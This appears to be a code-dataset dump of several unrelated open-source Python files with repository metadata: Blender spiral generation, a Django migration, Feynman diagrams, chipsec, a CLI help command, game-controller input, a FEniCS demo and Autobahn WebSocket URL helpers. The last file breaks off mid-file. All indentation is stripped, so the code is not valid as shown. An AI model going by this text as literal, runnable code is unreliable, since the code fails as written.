flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
deltaA = 2 * pi / N * sign # angle increment
deltaE = exponent / N # exponent increment
deltaR = (eR + iR) # radius increment
deltaZ = height / (N * turns) # z increment
e = 0
r = iR
phi = phase
x, y, z = [0, 0, -deltaZ]
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
x = x + r * cos(phi) * scale
y = y + r * sin(phi) * scale
z = z + deltaZ
e = e + deltaE
r = r + deltaR * exp(e)
phi = phi + deltaA
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def normalize_spiral(verts, normalize_eR, eR, iR, scale):
'''
Normalize the spiral (XY) to either exterior or interior radius
'''
if normalize_eR: # normalize to exterior radius (ending radius)
psx = verts[-1][0] # x coordinate of the last point in the spiral
psy = verts[-1][1] # y coordinate of the last point in the spiral
r = sqrt(psx * psx + psy * psy)
ss = eR / r * scale if eR != 0 else 1
else: # normalize to interior radius (starting radius)
psx = verts[0][0] # x coordinate of the first point in the spiral
psy = verts[0][1] # y coordinate of the first point in the spiral
r = sqrt(psx * psx + psy * psy)
ss = iR / r * scale if iR != 0 else 1
for n in range(len(verts)):
verts[n][0] *= ss
verts[n][1] *= ss
return verts
class SvSpiralNodeMK2(bpy.types.Node, SverchCustomTreeNode, SvAngleHelper):
"""
Triggers: Spiral
Tooltip: Generate spiral curves
"""
bl_idname = 'SvSpiralNodeMK2'
bl_label = 'Spiral'
sv_icon = "SV_SPIRAL"
def update_angles(self, context, au):
''' Update all the angles to preserve their values in the new units '''
self.phase = self.phase * au
def update_spiral(self, context):
if self.updating:
return
self.presets = " "
updateNode(self, context)
def preset_items(self, context):
return [(k, k.title(), "", "", s[0]) for k, s in sorted(spiral_presets.items(), key=lambda k: k[1][0])]
def update_presets(self, context):
self.updating = True
if self.presets == " ":
self.updating = False
return
_, sT, eR, iR, e, t, N, s, h = spiral_presets[self.presets]
self.sType = sT
self.eRadius = eR
self.iRadius = iR
self.exponent = e
self.turns = t
self.resolution = N
self.scale = s
self.height = h
self.phase = 0.0
self.arms = 1
self.flip = False
self.separate = False
self.updating = False
updateNode(self, context)
presets: EnumProperty(
name="Presets", items=preset_items,
update=update_presets)
sType: EnumProperty(
name="Type", items=spiral_type_items,
default="ARCHIMEDEAN", update=update_spiral)
normalize: EnumProperty(
name="Normalize Radius", items=normalize_items,
default="ER", update=update_spiral)
iRadius: FloatProperty(
name="Interior Radius", description="Interior radius",
default=1.0, min=0.0, update=update_spiral)
eRadius: FloatProperty(
name="Exterior Radius", description="Exterior radius",
default=2.0, min=0.0, update=update_spiral)
turns: IntProperty(
name="Turns", description="Number of turns",
default=11, min=1, update=update_spiral)
arms: IntProperty(
name="Arms", description="Number of spiral arms",
default=1, min=1, update=update_spiral)
flip: BoolProperty(
name="Flip Direction", description="Flip spiral direction",
default=False, update=update_spiral)
scale: FloatProperty(
name="Scale", description="Scale spiral vertices",
default=1.0, update=update_spiral)
height: FloatProperty(
name="Height", description="Height of the spiral along z",
default=0.0, update=update_spiral)
phase: FloatProperty(
name="Phase", description="Phase amount around spiral center",
default=0.0, update=SvAngleHelper.update_angle)
exponent: FloatProperty(
name="Exponent", description="Exponent attenuator",
default=2.0, update=update_spiral)
resolution: IntProperty(
name="Turn Resolution", description="Number of vertices in one turn in the spiral",
default=100, min=3, update=update_spiral)
separate: BoolProperty(
name="Separate arms",
description="Separate the spiral arms",
default=False, update=update_spiral)
updating: BoolProperty(default=False) # used for disabling update callback
def migrate_from(self, old_node):
''' Migration from old nodes '''
if old_node.bl_idname == "SvSpiralNode":
self.sType = old_node.stype
self.last_angle_units = AngleUnits.RADIANS
self.angle_units = AngleUnits.RADIANS
def sv_init(self, context):
self.width = 170
self.inputs.new('SvStringsSocket', "R").prop_name = 'eRadius'
self.inputs.new('SvStringsSocket', "r").prop_name = 'iRadius'
self.inputs.new('SvStringsSocket', "e").prop_name = 'exponent'
self.inputs.new('SvStringsSocket', "t").prop_name = 'turns'
self.inputs.new('SvStringsSocket', "n").prop_name = 'resolution'
self.inputs.new('SvStringsSocket', "s").prop_name = 'scale'
self.inputs.new('SvStringsSocket', "h").prop_name = 'height'
self.inputs.new('SvStringsSocket', "p").prop_name = 'phase'
self.inputs.new('SvStringsSocket', "a").prop_name = 'arms'
self.outputs.new('SvVerticesSocket', "Vertices")
self.outputs.new('SvStringsSocket', "Edges")
self.presets = "ARCHIMEDEAN"
def draw_buttons(self, context, layout):
layout.prop(self, 'presets')
layout.prop(self, 'sType', text="")
col = layout.column(align=True)
if self.sType in ("LOGARITHMIC", "ARCHIMEDEAN", "SPIRANGLE"):
row = col.row(align=True)
row.prop(self, 'normalize', expand=True)
row = col.row(align=True)
row.prop(self, 'flip', text="Flip", toggle=True)
row.prop(self, 'separate', text="Separate", toggle=True)
def draw_buttons_ext(self, context, layout):
self.draw_angle_units_buttons(context, layout)
def process(self):
outputs = self.outputs
# return if no outputs are connected
if not any(s.is_linked for s in outputs):
return
# input values lists (single or multi value)
inputs = self.inputs
input_R = inputs["R"].sv_get()[0] # list of exterior radii
input_r = inputs["r"].sv_get()[0] # list of interior radii
input_e = inputs["e"].sv_get()[0] # list of exponents
input_t = inputs["t"].sv_get()[0] # list of turns
input_n = inputs["n"].sv_get()[0] # list of curve resolutions
input_s = inputs["s"].sv_get()[0] # list of scales
input_h = inputs["h"].sv_get()[0] # list of heights (z)
input_p = inputs["p"].sv_get()[0] # list of phases
input_a = inputs["a"].sv_get()[0] # list of arms
# sanitize the input
input_R = list(map(lambda x: max(0.0, x), input_R))
input_r = list(map(lambda x: max(0.0, x), input_r))
input_t = list(map(lambda x: max(1, int(x)), input_t))
input_n = list(map(lambda x: max(3, int(x)), input_n))
input_a = list(map(lambda x: max(1, int(x)), input_a))
# extra parameters
f = self.flip # flip direction
parameters = match_long_repeat([input_R, input_r, input_e, input_t,
input_n, input_s, input_h, input_p, input_a])
# conversion factor from the current angle units to radians
au = self.radians_conversion_factor()
make_spiral = eval("make_" + self.sType.lower() + "_spiral")
verts_list = []
edges_list = []
for R, r, e, t, n, s, h, p, a in zip(*parameters):
p = p * au
arm_verts = []
arm_edges = []
for i in range(a): # generate each arm
pa = p + 2 * pi / a * i
settings = [R, r, e, t, n, s, h, pa, f] # spiral settings
verts, edges, norms = make_spiral(settings)
if self.sType in ("LOGARITHMIC", "ARCHIMEDEAN", "SPIRANGLE"):
normalize_spiral(verts, self.normalize == "ER", R, r, s)
if self.separate:
arm_verts.append(verts)
arm_edges.append(edges)
else: # join the arms
o = len(arm_verts)
edges = [[i1 + o, i2 + o] for (i1, i2) in edges]
arm_verts.extend(verts)
arm_edges.extend(edges)
verts_list.append(arm_verts)
edges_list.append(arm_edges)
self.outputs['Vertices'].sv_set(verts_list)
self.outputs['Edges'].sv_set(edges_list)
def register():
bpy.utils.register_class(SvSpiralNodeMK2)
def unregister():
bpy.utils.unregister_class(SvSpiralNodeMK2)
|
gpl-3.0
| -9,002,781,532,965,027,000
| 32.879389
| 111
| 0.567437
| false
| 3.223094
| false
| false
| false
|
EBI-Metagenomics/emgapi
|
emgapi/migrations/0028_auto_20200706_1823.py
|
1
|
1069
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.25 on 2020-06-16 12:02
from __future__ import unicode_literals
from django.db import migrations
def add_checksum_algorithms(apps, schema_editor):
"""
Add hash algorithms:
- SHA1
- SHA256
- MD5
"""
ChecksumAlgorithms = apps.get_model("emgapi", "ChecksumAlgorithm")
for alg in ["SHA1", "SHA256", "MD5"]:
ChecksumAlgorithms.objects.get_or_create(name=alg)
def remove_checksum_algorithms(apps, schema_editor):
"""
Remove hash algorithms:
- SHA1
- SHA256
- MD5
"""
ChecksumAlgorithms = apps.get_model("emgapi", "ChecksumAlgorithm")
for alg in ["SHA1", "SHA256", "MD5"]:
try:
ChecksumAlgorithms.objects.get(name=alg).delete()
except ChecksumAlgorithms.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('emgapi', '0027_auto_20200706_1823'),
]
operations = [
migrations.RunPython(add_checksum_algorithms, reverse_code=remove_checksum_algorithms)
]
|
apache-2.0
| 3,405,595,739,773,955,600
| 24.452381
| 94
| 0.637979
| false
| 3.587248
| false
| false
| false
|
itoijala/pyfeyner
|
examples/pyfeyn-test3.py
|
1
|
2416
|
#!/usr/bin/env python2
#
# pyfeyner - a simple Python interface for making Feynman diagrams.
# Copyright (C) 2005-2010 Andy Buckley, Georg von Hippel
# Copyright (C) 2013 Ismo Toijala
#
# pyfeyner is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pyfeyner is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with pyfeyner; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
## A B-meson colour-suppressed penguin decay diagram
# _
# in1 ------(_)------() out1a
# \ ____() out1b
# \(____
# () out2a
# in2 ---------------() out2b
#
from pyfeyner.user import *
import pyx
fd = FeynDiagram()
in1 = Point(1, 7)
loop_in = Vertex(4, 7)
loop_out = Vertex(7, 7)
out1a = Point(11, 7)
out1b = Point(11, 5)
in2 = Point(1, 0)
out2a = Point(11, 2)
out2b = Point(11, 0)
out1c = Vertex(out1b.x() - 2, out1b.y())
out1d = Vertex(out2a.x() - 2, out2a.y())
vtx = Vertex(out1c.midpoint(out1d).x() - 1.5, out1c.midpoint(out1d).y())
fd.add(Fermion(out2b, in2).addArrow().addLabel(r"\APdown"))
fd.add(Fermion(in1, loop_in).addArrow().addLabel(r"\Pbottom"))
fd.add(Fermion(loop_out, out1a).addArrow().addLabel(r"\Pstrange"))
fd.add(Photon(loop_in, loop_out).bend(-1.5).addLabel(r"\PWplus"))
f_loop, = fd.add(Fermion(loop_in, loop_out).bend(+1.5).addArrow() \
.addLabel(r"\Pup,\,\Pcharm,\,\Ptop"))
fd.add(Photon(f_loop.fracpoint(0.6), vtx).addLabel(r"\Pphoton/\PZ", displace=0.5).bend(0.5))
fd.add(Fermion(out1b, out1c).addArrow(0.8).addLabel(r"\APup"))
fd.add(Fermion(out1c, out1d).arcThru(vtx))
fd.add(Fermion(out1d, out2a).addArrow(0.2).addLabel(r"\Pup"))
fd.add(Ellipse(x=1, y=3.5, xradius=1, yradius=3.5).setFillStyle(pyx.pattern.crosshatched(0.1, 45)))
fd.add(Ellipse(x=11, y=6, xradius=0.6, yradius=1).setFillStyle(pyx.pattern.hatched135))
fd.add(Ellipse(x=11, y=1, xradius=0.6, yradius=1).setFillStyle(pyx.pattern.hatched135))
fd.draw("pyfeyn-test3.pdf")
|
gpl-2.0
| 8,639,295,022,185,520,000
| 36.75
| 99
| 0.678394
| false
| 2.511435
| false
| false
| false
|
johnloucaides/chipsec
|
chipsec/module_common.py
|
1
|
3593
|
#!/usr/bin/python
#CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2015, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#chipsec@intel.com
#
# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
# (c) 2010-2012 Intel Corporation
#
# -------------------------------------------------------------------------------
"""
Common include file for modules
"""
import platform
import string
import sys
import os
from time import localtime, strftime
import chipsec.logger
import chipsec.chipset
import chipsec.defines
class ModuleResult:
FAILED = 0
PASSED = 1
WARNING = 2
SKIPPED = 3
DEPRECATED = 4
INFORMATION = 5
ERROR = -1
ModuleResultName = {
ModuleResult.FAILED: "Failed",
ModuleResult.PASSED: "Passed",
ModuleResult.WARNING: "Warning",
ModuleResult.SKIPPED: "Skipped",
ModuleResult.DEPRECATED: "Deprecated",
ModuleResult.INFORMATION: "Information",
ModuleResult.ERROR: "Error"
}
def getModuleResultName(res):
return ModuleResultName[res] if res in ModuleResultName else ModuleResultName[ModuleResult.ERROR]
class BaseModule(object):
def __init__(self):
self.cs = chipsec.chipset.cs()
self.logger = chipsec.logger.logger()
self.res = ModuleResult.PASSED
def is_supported(self):
"""
This method should be overwritten by the module returning True or False
depending whether or not this module is supported in the currently running
platform.
To access the currently running platform use
>>> self.cs.get_chipset_id()
"""
return True
def update_res(self, value):
if self.res == ModuleResult.WARNING:
if value == ModuleResult.FAILED \
or value == ModuleResult.ERROR:
self.res = value
elif self.res == ModuleResult.FAILED:
if value == ModuleResult.ERROR:
self.res = value
elif self.res == ModuleResult.INFORMATION:
self.res = value
else: # PASSED or SKIPPED or DEPRECATED
self.res = value
def run(self, module_argv):
raise NotImplementedError('sub class should overwrite the run() method')
MTAG_BIOS = "BIOS"
MTAG_SMM = "SMM"
MTAG_SECUREBOOT = "SECUREBOOT"
MTAG_HWCONFIG = "HWCONFIG"
MTAG_CPU = "CPU"
##! [Available Tags]
MTAG_METAS = {
MTAG_BIOS: "System Firmware (BIOS/UEFI) Modules",
MTAG_SMM: "System Management Mode (SMM) Modules",
MTAG_SECUREBOOT: "Secure Boot Modules",
MTAG_HWCONFIG: "Hardware Configuration Modules",
MTAG_CPU: "CPU Modules",
}
##! [Available Tags]
MODULE_TAGS = dict( [(_tag, []) for _tag in MTAG_METAS])
#
# Common module command line options
#
OPT_MODIFY = 'modify'
|
gpl-2.0
| 2,244,424,559,796,795,000
| 27.515873
| 101
| 0.629001
| false
| 4.069083
| false
| false
| false
|
mbollmann/perceptron
|
mmb_perceptron/feature_extractor/generator/generative_extractor.py
|
1
|
3342
|
# -*- coding: utf-8 -*-
import numpy as np
from .. import FeatureExtractor
class GenerativeExtractor(FeatureExtractor):
"""Abstract base class for a generative feature extractor.
Compared to simple feature extractors, generators perform the additional
task of generating class label candidates. This means that they don't
return a single feature vector, but a dictionary mapping candidate classes
(for the classifier) to their respective feature vectors.
In terms of the perceptron algorithm, they combine the GEN() and Phi()
functions in a single object for ease of implementation.
"""
def _rebind_methods(self, status):
super(GenerativeExtractor, self)._rebind_methods(status)
if status:
self.generate = self._generate_sequenced
self.generate_vector = self._generate_vector_sequenced
else:
self.generate = self._generate_independent
self.generate_vector = self._generate_vector_independent
def _generate_independent(self, x, truth=None):
"""Return candidates and their feature representations.
Should return a tuple (F, C), where F is a list of feature
representations, and C is a list of class labels so that C[i] is the
class label belonging to the feature representation F[i].
During training, the **first element in these lists** is considered by
the perceptron to be the **correct class label** for this data point.
If the parameter 'truth' is supplied, it indicates the gold-standard
best candidate according to the training data; however, it is up to the
generator function whether to include this value as the first element of
the feature representations (thereby making the **gold standard** the
correct class label for the perceptron learner) or generate the
candidates independently and select an **oracle-best** class label from
those.
"""
raise NotImplementedError("function not implemented")
def _generate_sequenced(self, seq, pos, history=None, truth=None):
raise NotImplementedError("function not implemented")
def _generate_vector_independent(self, x, truth=None, grow=True):
"""Return candidates and their feature representations.
Identical to _generate_independent(), except that F is now a matrix of
numerical feature vectors.
"""
(features, labels) = self._generate_independent(x, truth=truth)
if grow:
for f in features:
self._label_mapper.extend(f)
vectors = np.array([self._label_mapper.map_to_vector(f) for f in features])
else:
vectors = np.array([self._label_mapper.get_vector(f) for f in features])
return (vectors, labels)
def _generate_vector_sequenced(self, seq, pos, history=None, truth=None, grow=True):
(features, labels) = \
self._generate_sequenced(seq, pos, history=history, truth=truth)
if grow:
for f in features:
self._label_mapper.extend(f)
vectors = np.array([self._label_mapper.map_to_vector(f) for f in features])
else:
vectors = np.array([self._label_mapper.get_vector(f) for f in features])
return (vectors, labels)
|
mit
| -3,316,705,741,891,611,600
| 44.162162
| 88
| 0.666966
| false
| 4.479893
| false
| false
| false
|
openstack/cliff
|
cliff/help.py
|
1
|
4846
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import inspect
import traceback
from . import command
class HelpExit(SystemExit):
"""Special exception type to trigger quick exit from the application
We subclass from SystemExit to preserve API compatibility for
anything that used to catch SystemExit, but use a different class
so that cliff's Application can tell the difference between
something trying to hard-exit and help saying it's done.
"""
class HelpAction(argparse.Action):
"""Provide a custom action so the -h and --help options
to the main app will print a list of the commands.
The commands are determined by checking the CommandManager
instance, passed in as the "default" value for the action.
"""
def __call__(self, parser, namespace, values, option_string=None):
app = self.default
parser.print_help(app.stdout)
app.stdout.write('\nCommands:\n')
dists_by_module = command._get_distributions_by_modules()
def dist_for_obj(obj):
name = inspect.getmodule(obj).__name__.partition('.')[0]
return dists_by_module.get(name)
app_dist = dist_for_obj(app)
command_manager = app.command_manager
for name, ep in sorted(command_manager):
try:
factory = ep.load()
except Exception:
app.stdout.write('Could not load %r\n' % ep)
if namespace.debug:
traceback.print_exc(file=app.stdout)
continue
try:
kwargs = {}
if 'cmd_name' in inspect.getfullargspec(factory.__init__).args:
kwargs['cmd_name'] = name
cmd = factory(app, None, **kwargs)
if cmd.deprecated:
continue
except Exception as err:
app.stdout.write('Could not instantiate %r: %s\n' % (ep, err))
if namespace.debug:
traceback.print_exc(file=app.stdout)
continue
one_liner = cmd.get_description().split('\n')[0]
dist_name = dist_for_obj(factory)
if dist_name and dist_name != app_dist:
dist_info = ' (' + dist_name + ')'
else:
dist_info = ''
app.stdout.write(' %-13s %s%s\n' % (name, one_liner, dist_info))
raise HelpExit()
class HelpCommand(command.Command):
"""print detailed help for another command
"""
def get_parser(self, prog_name):
parser = super(HelpCommand, self).get_parser(prog_name)
parser.add_argument('cmd',
nargs='*',
help='name of the command',
)
return parser
def take_action(self, parsed_args):
if parsed_args.cmd:
try:
the_cmd = self.app.command_manager.find_command(
parsed_args.cmd,
)
cmd_factory, cmd_name, search_args = the_cmd
except ValueError:
# Did not find an exact match
cmd = parsed_args.cmd[0]
fuzzy_matches = [k[0] for k in self.app.command_manager
if k[0].startswith(cmd)
]
if not fuzzy_matches:
raise
self.app.stdout.write('Command "%s" matches:\n' % cmd)
for fm in sorted(fuzzy_matches):
self.app.stdout.write(' %s\n' % fm)
return
self.app_args.cmd = search_args
kwargs = {}
if 'cmd_name' in inspect.getfullargspec(cmd_factory.__init__).args:
kwargs['cmd_name'] = cmd_name
cmd = cmd_factory(self.app, self.app_args, **kwargs)
full_name = (cmd_name
if self.app.interactive_mode
else ' '.join([self.app.NAME, cmd_name])
)
cmd_parser = cmd.get_parser(full_name)
cmd_parser.print_help(self.app.stdout)
else:
action = HelpAction(None, None, default=self.app)
action(self.app.parser, self.app.options, None, None)
return 0
|
apache-2.0
| -4,748,475,090,079,885,000
| 37.768
| 79
| 0.554065
| false
| 4.326786
| false
| false
| false
|
ApproxEng/approxeng.input
|
src/python/approxeng/input/selectbinder.py
|
1
|
6065
|
from functools import reduce
from select import select
from threading import Thread
import approxeng.input.sys as sys
from approxeng.input.controllers import *
EV_KEY = 1
EV_REL = 2
EV_ABS = 3
class ControllerResource:
"""
General resource which binds one or more controllers on entry and unbinds the event listening thread on exit.
"""
def __init__(self, *requirements, print_events=False, **kwargs):
"""
Create a new resource to bind and access one or more controllers. If no additional arguments are supplied this
will find the first controller of any kind enabled by the library. Otherwise the requirements must be provided
as a list of ControllerRequirement
:param ControllerRequirement requirements:
ControllerRequirement instances used, in order, to find and bind controllers. If empty this will
be equivalent to supplying a single unfiltered requirement and will match the first specified controller.
:param bool print_events:
Defaults to False, if set to True then all events picked up by the binder will be printed to stdout. Use
this when you're trying to figure out what events correspond to what axes and buttons!
:param kwargs:
Any addition keyword arguments are passed to the constructors for the controller classes. This is useful
particularly to specify e.g. dead and hot zone ranges on discovery.
:raises ControllerNotFoundError:
If the requirement can't be satisfied, or no requirements are specified but there aren't any controllers.
"""
self.discoveries = find_matching_controllers(*requirements, **kwargs)
self.unbind = None
self.print_events = print_events
def __enter__(self):
"""
Called on entering the resource block, returns the controller passed into the constructor.
"""
self.unbind = bind_controllers(*self.discoveries, print_events=self.print_events)
if len(self.discoveries) == 1:
return self.discoveries[0].controller
else:
return tuple(discovery.controller for discovery in self.discoveries)
def __exit__(self, exc_type, exc_value, traceback):
"""
Called on resource exit, unbinds the controller, removing the listening thread.
"""
self.unbind()
def bind_controllers(*discoveries, print_events=False):
"""
Bind a controller or controllers to a set of evdev InputDevice instances, starting a thread to keep those
controllers in sync with the state of the hardware.
:param ControllerDiscovery discoveries:
ControllerDiscovery instances specifying the controllers and their associated input devices
:param bool print_events:
Defaults to False, if set to True then all events picked up by this binder will be printed to stdout
:return:
A function which can be used to stop the event reading thread and unbind from the device
"""
discoveries = list(discoveries)
class SelectThread(Thread):
def __init__(self):
Thread.__init__(self, name='evdev select thread')
self.daemon = True
self.running = True
self.device_to_controller_discovery = {}
for discovery in discoveries:
for d in discovery.devices:
self.device_to_controller_discovery[d.fn] = discovery
self.all_devices = reduce(lambda x, y: x + y, [discovery.devices for discovery in discoveries])
def run(self):
for discovery in discoveries:
discovery.controller.device_unique_name = discovery.name
while self.running:
try:
r, w, x = select(self.all_devices, [], [], 0.5)
for fd in r:
active_device = fd
controller_discovery = self.device_to_controller_discovery[active_device.fn]
controller = controller_discovery.controller
controller_devices = controller_discovery.devices
prefix = None
if controller.node_mappings is not None and len(controller_devices) > 1:
try:
prefix = controller.node_mappings[active_device.name]
except KeyError:
pass
for event in active_device.read():
if print_events:
print(event)
if event.type == EV_ABS or event.type == EV_REL:
controller.axes.axis_updated(event, prefix=prefix)
elif event.type == EV_KEY:
# Button event
if event.value == 1:
# Button down
controller.buttons.button_pressed(event.code, prefix=prefix)
elif event.value == 0:
# Button up
controller.buttons.button_released(event.code, prefix=prefix)
except Exception as e:
self.stop(e)
def stop(self, exception=None):
for discovery in discoveries:
discovery.controller.device_unique_name = None
discovery.controller.exception = exception
self.running = False
polling_thread = SelectThread()
# Force an update of the LED and battery system cache
sys.scan_cache(force_update=True)
for device in polling_thread.all_devices:
device.grab()
def unbind():
polling_thread.stop()
for dev in polling_thread.all_devices:
try:
dev.ungrab()
except IOError:
pass
polling_thread.start()
return unbind
|
apache-2.0
| -2,654,246,842,321,006,600
| 40.541096
| 118
| 0.591096
| false
| 5.131134
| false
| false
| false
|
akshmakov/Dolfin-Fijee-Fork
|
test/unit/book/python/chapter_1_files/stationary/poisson/d2_p2D.py
|
1
|
1457
|
"""
FEniCS tutorial demo program: Poisson equation with Dirichlet conditions.
As d1_p2D.py, but chosing linear solver and preconditioner is demonstrated.
-Laplace(u) = f on the unit square.
u = u0 on the boundary.
u0 = u = 1 + x^2 + 2y^2, f = -6.
"""
from dolfin import *
# Create mesh and define function space
mesh = UnitSquareMesh(60, 40)
V = FunctionSpace(mesh, 'Lagrange', 1)
# Define boundary conditions
u0 = Expression('1 + x[0]*x[0] + 2*x[1]*x[1]')
def u0_boundary(x, on_boundary):
return on_boundary
bc = DirichletBC(V, u0, u0_boundary)
# Define variational problem
u = TrialFunction(V)
v = TestFunction(V)
f = Constant(-6.0)
a = inner(nabla_grad(u), nabla_grad(v))*dx
L = f*v*dx
# Compute solution
u = Function(V)
info(parameters, True)
prm = parameters['krylov_solver'] # short form
prm['absolute_tolerance'] = 1E-5
prm['relative_tolerance'] = 1E-3
prm['maximum_iterations'] = 1000
#prm['preconditioner']['ilu']['fill_level'] = 0
print parameters['linear_algebra_backend']
#set_log_level(PROGRESS)
set_log_level(DEBUG)
solve(a == L, u, bc,
solver_parameters={'linear_solver': 'cg',
'preconditioner': 'ilu'})
# Alternative syntax
solve(a == L, u, bc,
solver_parameters=dict(linear_solver='cg',
preconditioner='ilu'))
# Plot solution and mesh
#plot(u)
#plot(mesh)
# Dump solution to file in VTK format
file = File('poisson.pvd')
file << u
# Hold plot
interactive()
|
gpl-3.0
| -481,046,481,958,258,050
| 22.885246
| 75
| 0.663693
| false
| 2.840156
| false
| false
| false
|
danielfaust/AutobahnPython
|
autobahn/autobahn/websocket.py
|
1
|
140218
|
###############################################################################
##
## Copyright 2011,2012 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
## The Python urlparse module currently does not contain the ws/wss
## schemes, so we add those dynamically (which is a hack of course).
##
import urlparse
wsschemes = ["ws", "wss"]
urlparse.uses_relative.extend(wsschemes)
urlparse.uses_netloc.extend(wsschemes)
urlparse.uses_params.extend(wsschemes)
urlparse.uses_query.extend(wsschemes)
urlparse.uses_fragment.extend(wsschemes)
from twisted.internet import reactor, protocol
from twisted.python import log
import urllib
import binascii
import hashlib
import base64
import struct
import random
import os
from array import array
from collections import deque
from utf8validator import Utf8Validator
from xormasker import XorMaskerNull, XorMaskerSimple, XorMaskerShifted1
from httpstatus import *
import autobahn # need autobahn.version
def createWsUrl(hostname, port = None, isSecure = False, path = None, params = None):
"""
Create a WbeSocket URL from components.
:param hostname: WebSocket server hostname.
:type hostname: str
:param port: WebSocket service port or None (to select default ports 80/443 depending on isSecure).
:type port: int
:param isSecure: Set True for secure WebSockets ("wss" scheme).
:type isSecure: bool
:param path: Path component of addressed resource (will be properly URL escaped).
:type path: str
:param params: A dictionary of key-values to construct the query component of the addressed resource (will be properly URL escaped).
:type params: dict
:returns str -- Constructed WebSocket URL.
"""
if port is not None:
netloc = "%s:%d" % (hostname, port)
else:
if isSecure:
netloc = "%s:443" % hostname
else:
netloc = "%s:80" % hostname
if isSecure:
scheme = "wss"
else:
scheme = "ws"
if path is not None:
ppath = urllib.quote(path)
else:
ppath = "/"
if params is not None:
query = urllib.urlencode(params)
else:
query = None
return urlparse.urlunparse((scheme, netloc, ppath, None, query, None))
def parseWsUrl(url):
"""
Parses as WebSocket URL into it's components and returns a tuple (isSecure, host, port, resource, path, params).
isSecure is a flag which is True for wss URLs.
host is the hostname or IP from the URL.
port is the port from the URL or standard port derived from scheme (ws = 80, wss = 443).
resource is the /resource name/ from the URL, the /path/ together with the (optional) /query/ component.
path is the /path/ component properly unescaped.
params is the /query) component properly unescaped and returned as dictionary.
:param url: A valid WebSocket URL, i.e. ws://localhost:9000/myresource?param1=23¶m2=666
:type url: str
:returns: tuple -- A tuple (isSecure, host, port, resource, path, params)
"""
parsed = urlparse.urlparse(url)
if parsed.scheme not in ["ws", "wss"]:
raise Exception("invalid WebSocket scheme '%s'" % parsed.scheme)
if parsed.port is None or parsed.port == "":
if parsed.scheme == "ws":
port = 80
else:
port = 443
else:
port = int(parsed.port)
if parsed.fragment is not None and parsed.fragment != "":
raise Exception("invalid WebSocket URL: non-empty fragment '%s" % parsed.fragment)
if parsed.path is not None and parsed.path != "":
ppath = parsed.path
path = urllib.unquote(ppath)
else:
ppath = "/"
path = ppath
if parsed.query is not None and parsed.query != "":
resource = ppath + "?" + parsed.query
params = urlparse.parse_qs(parsed.query)
else:
resource = ppath
params = {}
return (parsed.scheme == "wss", parsed.hostname, port, resource, path, params)
def connectWS(factory, contextFactory = None, timeout = 30, bindAddress = None):
"""
Establish WebSockets connection to a server. The connection parameters like target
host, port, resource and others are provided via the factory.
:param factory: The WebSockets protocol factory to be used for creating client protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketClientFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSockets connections ("wss").
:type contextFactory: A twisted.internet.ssl.ClientContextFactory instance.
:param timeout: Number of seconds to wait before assuming the connection has failed.
:type timeout: int
:param bindAddress: A (host, port) tuple of local address to bind to, or None.
:type bindAddress: tuple
:returns: obj -- An object which provides twisted.interface.IConnector.
"""
if factory.isSecure:
if contextFactory is None:
# create default client SSL context factory when none given
from twisted.internet import ssl
contextFactory = ssl.ClientContextFactory()
conn = reactor.connectSSL(factory.host, factory.port, factory, contextFactory, timeout, bindAddress)
else:
conn = reactor.connectTCP(factory.host, factory.port, factory, timeout, bindAddress)
return conn
def listenWS(factory, contextFactory = None, backlog = 50, interface = ''):
"""
Listen for incoming WebSocket connections from clients. The connection parameters like
listening port and others are provided via the factory.
:param factory: The WebSockets protocol factory to be used for creating server protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketServerFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSockets connections ("wss").
:type contextFactory: A twisted.internet.ssl.ContextFactory.
:param backlog: Size of the listen queue.
:type backlog: int
:param interface: The interface (derived from hostname given) to bind to, defaults to '' (all).
:type interface: str
:returns: obj -- An object that provides twisted.interface.IListeningPort.
"""
if factory.isSecure:
if contextFactory is None:
raise Exception("Secure WebSocket listen requested, but no SSL context factory given")
listener = reactor.listenSSL(factory.port, factory, contextFactory, backlog, interface)
else:
listener = reactor.listenTCP(factory.port, factory, backlog, interface)
return listener
class FrameHeader:
"""
